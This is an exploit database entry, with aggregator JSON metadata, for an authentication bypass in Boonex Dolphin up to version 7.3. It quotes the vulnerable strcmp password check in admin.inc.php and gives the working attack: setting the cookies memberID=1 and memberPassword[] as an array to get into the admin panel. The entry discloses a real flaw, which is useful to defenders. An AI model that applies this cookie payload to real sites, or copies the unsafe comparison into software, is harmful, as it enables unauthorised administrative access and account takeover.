ID 1337DAY-ID-26140 Type zdt Reporter Saadi Siddiqui Modified 2016-10-26T00:00:00
Description
Exploit for php platform in category web applications
# Exploit Title : Boonex Dolphin all versoin <= 7.3 Authentication Bypass
# Exploit Author : Saadat Ullah saadi_linux[@]rocketmail.com
# Software Link : https://www.boonex.com
# Author HomePage : http://security-geeks.blogspot.com
Proof of Concept
File: admin.inc.php
Line: 187
Code: (strcmp($aProfile['Password'], $passwd) != 0)
$passwd is equal to Cookie parameter memberpassword
Bug:
According to PHP documentation strcmp will compare strings, but what if we provide an array???
So, simple bypass is to put two cookies in browser
memberID=1
memberPassword[]=blah --->array
This will allow the attacker to bypass the authentication and can also enter in admin panel.
#Independent Pakistani Security Researcher
# 0day.today [2018-02-15] #
{"href": "https://0day.today/exploit/description/26140", "history": [], "sourceData": "# Exploit Title : Boonex Dolphin all versoin <= 7.3 Authentication Bypass\r\n# Exploit Author : Saadat Ullah saadi_linux[@]rocketmail.com\r\n# Software Link : https://www.boonex.com\r\n# Author HomePage : http://security-geeks.blogspot.com\r\n \r\n \r\nProof of Concept\r\n \r\nFile: admin.inc.php\r\nLine: 187\r\nCode: (strcmp($aProfile['Password'], $passwd) != 0)\r\n \r\n$passwd is equal to Cookie parameter memberpassword\r\n \r\nBug:\r\nAccording to PHP documentation strcmp will compare strings, but what if we provide an array???\r\n \r\nSo, simple bypass is to put two cookies in browser\r\nmemberID=1\r\nmemberPassword[]=blah --->array\r\n \r\nThis will allow the attacker to bypass the authentication and can also enter in admin panel.\r\n \r\n#Independent Pakistani Security Researcher\n\n# 0day.today [2018-02-15] #", "bulletinFamily": "exploit", "modified": "2016-10-26T00:00:00", "title": "Boonex Dolphin 7.3.2 - Authentication Bypass Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://0day.today/exploit/26140", "cvelist": [], "description": "Exploit for php platform in category web applications", "viewCount": 6, "published": "2016-10-26T00:00:00", "edition": 1, "hash": "4d0fba862cb7ad8ed63cf6cacd11d14aa801ae3d00f3c13e4a0611b93d211cff", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "bd3875aba5a186d6217dbc2622e82549"}, {"key": "modified", "hash": "1d731490b777bc15c5d9375993128995"}, {"key": "published", "hash": "1d731490b777bc15c5d9375993128995"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "528d549491126d98e2fa728930bd3f2a"}, {"key": "sourceData", "hash": "4c74bf306793827b4b31df7537052c00"}, {"key": "sourceHref", "hash": "f88c4c4a3fdf2783d85131927808d923"}, {"key": "title", "hash": "af7fba3ec34d1b23f7b09f67b577419e"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "id": "1337DAY-ID-26140", "type": "zdt", "lastseen": "2018-02-16T01:18:01", "reporter": "Saadi Siddiqui", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-02-16T01:18:01"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26140"]}], "modified": "2018-02-16T01:18:01"}, "vulnersScore": 0.4}, "objectVersion": "1.3", "references": []}